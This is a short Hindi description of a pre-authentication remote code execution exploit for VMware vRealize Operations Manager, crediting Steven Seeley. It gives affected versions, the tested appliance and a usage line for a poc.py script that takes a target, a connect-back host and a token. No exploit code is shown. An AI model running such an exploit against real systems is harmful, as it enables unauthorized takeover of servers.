
यह VMware vRealize Operations Manager के लिए एक प्रमाणीकरण-पूर्व RCE एक्सप्लॉइट है।
यह VMware vRealize Operations Manager (vROPS) के लिए एक पूर्व-प्रमाणीकृत RCE एक्सप्लॉइट है जो <= 8.6.3.19682901 संस्करणों को प्रभावित करता है।
Qihoo 360 Vulnerability Research Institute के Steven Seeley
इस एक्सप्लॉइट का परीक्षण 8.6.3.19682901 पर vRealize-Operations-Manager-Appliance-8.6.3.19682901_OVF10.ova फ़ाइल (SHA1: 4637b6385db4fbee6b1150605087197f8d03ba00) का उपयोग करके किया गया था, लेकिन यह अन्य पुराने संस्करणों पर भी काम करने के लिए जाना जाता है।
यह एक्सप्लॉइट तीन कमजोरियों को जोड़ता है जिन्हें पैच किया गया है। अधिक विवरण ब्लॉग पोस्ट में पाए जा सकते हैं:
इस एक्सप्लॉइट के लिए हमलावर को निम्न प्रदान करना आवश्यक होगा:
APUAT-8.5.0.18176777.pak।इस एक्सप्लॉइट में बहुत सारे गतिशील भाग हैं, उम्मीद है कि मैंने इसे ठीक से इंजीनियर किया है ताकि यह पहली बार में काम करे।
एक्सप्लॉइट को पूरा होने में औसतन ~1m34.142s लगते हैं (5 बार परीक्षण किया गया), मैंने इसे तेज़ बनाने की कोशिश की, लेकिन यह एक प्रतियोगिता के लिए आवंटित समय के भीतर है ;->
researcher@mars:~$ ./poc.py
(+) usage: ./poc.py <target> <connectback> <dashboardlink_token>
(+) eg: ./poc.py 192.168.2.196 192.168.2.234 uuncuybis9
